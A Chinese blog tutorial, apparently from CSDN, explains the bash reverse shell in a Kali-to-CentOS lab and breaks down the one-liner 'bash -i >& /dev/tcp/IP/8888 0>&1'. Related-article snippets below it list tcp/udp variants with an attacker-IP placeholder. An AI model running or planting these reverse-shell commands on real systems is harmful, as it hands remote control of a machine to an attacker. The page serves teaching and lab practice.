Linux之bash反弹shell原理浅析

最新推荐文章于 2025-04-08 10:40:52 发布
最新推荐文章于 2025-04-08 10:40:52 发布
阅读量1.7w 收藏 111
点赞数 64
分类专栏: 基础知识
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Auuuuuuuu/article/details/89059176
版权

 

 

环境

攻击机:kali            ip:192.168.25.144

靶    机:centos      ip:192.168.25.142

 

过程

kali 监听本地8888端口

靶机 centos 写入 反弹shell 的命令

bash -i >& /dev/tcp/192.168.25.144/8888 0>&1

 

攻击机 kali 成功反弹shell

 

原理

反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其命令行的输入输出转到控制端,从而实现交互

 

我们将命令拆开

bash -i 
/dev/tcp/192.168.25.144/8888
 >&   0>&1

 

bash

Linux中一般默认的shell是bash,它功能几乎可以涵盖shell所具有的功能,所以一般的shell脚本都会指定它为执行路径

常用的shell有  ash、bash、dash、ksh、csh、zsh 等,不同的shell都有自己的特点以及用途

查询当前shell命令    ls -l /bin/sh

 

bash -i  打开一个交互式的bash            shell 如果有 -i 参数,就是交互式的

交互的意思就是可以和用户进行交互,输入命令,回显给用户就是一个交互的过程,而执行一个shell脚本就是非交互的

使用命令  echo $-  可以查看是否是交互式shell

     有参数  i ,是交互式的

执行一个shell脚本

  无参数 i ,非交互式

 

/dev目录

dev是设备(device)的英文缩写。这里主要存放与设备(包括外设)有关的文件,Linux一切皆文件

 /dev/tcp/是Linux中的一个特殊设备,打开这个文件就

最低0.47元/天 解锁文章
内网隧道代理技术(七)之Bash反弹shell
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-25 869
Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell
[ 隧道技术 ] 反弹shell的集中常见方式(二)bash反弹shell
qq_51577576的博客
09-04 930
[ 隧道技术 ] 反弹shell的集中常见方式(二)bash反弹shell bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1 bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2 bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1 bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2
【转】Linuxbash反弹shell原理浅析
mastergu2的博客
11-04 2391
    环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142   过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp...
渗透测试中反弹shell的27种实战方法全解析,从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-08 1108
反弹 shell 技术作为渗透测试领域的关键技能,犹如一把双刃剑,在专业人员手中,它是评估系统安全性、挖掘潜在漏洞的得力工具,能够帮助企业提前发现并修补安全防线的薄弱环节,有效抵御恶意攻击。但倘若落入不法之徒手中,便可能沦为窃取机密信息、破坏系统稳定、实施网络犯罪的凶器,给个人、企业乃至国家带来不可估量的损失。因此,对于广大网络安全从业者而言,深入理解并熟练掌握反弹 shell 技术不仅是提升个人专业素养的必经之路,更是维护网络空间安全稳定的职责所在。
浅析Linuxbash反弹shell原理
01-08
环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其
Linux反弹shell姿势复现(一)--- 利用bash反弹shell
weixin_44283446的博客
03-23 4265
反弹shell姿势复现(一)前言复现环境说明反弹shell姿势(一)--- 利用bash反弹shell重要说明方法一方法二 前言     反弹shell有很多种方式,这个系列内容较多,之后也会不断更新,对于反弹shell复现也算是一个近期工作的归纳总结吧。     注意:本博文仅供学习反弹shell的姿势使用,勿作其他用途的参考! 复现环境说明 我在ubuntu和centos上均做了复现,用于比较版本对反弹shell的影响
Shell】重定向以及基础的bash反弹shell的学习
BrosyveryOK的博客
09-14 1828
最近学了下shell脚本的编写,看见重定向想起前几天反弹shell的一道题,当时还看不太懂,学完重定向之后就有点能看懂了,写篇文章记录一下。
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
Ubuntu下反弹shell的思考
07-02 1281
相信各位师傅在平时渗透过程中会遇到ubuntu任务计划反弹shell失败的情况,本文就这一问题浅析一下。
bash命令_linux反弹shellbash命令解析
weixin_39529302的博客
11-20 3437
当我们在渗透Linux主机时,反弹一个可交互的shell是非常有必要的。那什么反弹shell又到底是什么呐?为什么要反弹shell呐?一、什么是反弹shell反弹shell(reverse shell),就是控制端(攻击者所有)监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转发到控制端。reverse shell与telnet,ssh等标准shell对应,本质...
反弹shell详细易懂讲解,看这一篇就够了
LCW991207的博客
05-26 2321
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6602
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹bash shell解释
-
03-15 797
反弹bash shell
Linux(五) 之 bash工作原理
jrymos软件工作室
04-12 3484
磨刀不误砍柴工,理解bash工作原理,就好比为学习Linux打好了地基一. Linux的基本原则: 1、由目的单一的小程序组成;组合小程序完成复杂任务; 2、一切皆文件; 3、尽量避免捕获用户接口; 4、配置文件保存为纯文本格式; Linux结构: 二. bash命令工作流程: 概念: bash也就是/bin/目录下的二进制程序了,比如ls,mv,cp等等 首先简要介绍下,在Lin
各种shell反弹方法
weixin_46626737的博客
05-16 3112
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
LinuxBash支持各种指令选项的原理:命令行参数
YYDsis的博客
03-21 1409
一.认识main函数参数【int argc & char *argv[ ]】二.回顾Bash支持各种指令选项 三.(正文)Bash支持各种指令选项的原理(含推导过程)
Linux 入门学习之bash基础原理之一
weixin_34208283的博客
08-13 209
Linux入门之bash基础编程语言分类: 机器语言、汇编语言、高级语言静态语言:编译型语言特点:变量为强类型实现转化为一定的可执行格式常见:C、C++、JAVA、C#、Object-C注意:一般需要解释器的编程语言一般为静态语言动态语言:解释性语言特点:变量未弱类型,边解释边执行常见: PHP、SHELL、python、perllua : 嵌入式脚...
反弹shell--bash一句话解析
小刚的博客
01-10 3440
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 反弹shell解析bash反弹shell解析拆分语句了解一下交互式连接设备文件描述符合并输入输出大合并 bash反弹shell解析 最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处 真是妙蛙种子被踢出了米奇妙妙屋。。。 bash -i >& /dev/tcp/192.168.1.1/8888 0>&1 拆分语句了解一下 交互式 bash -i是打开一个.
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值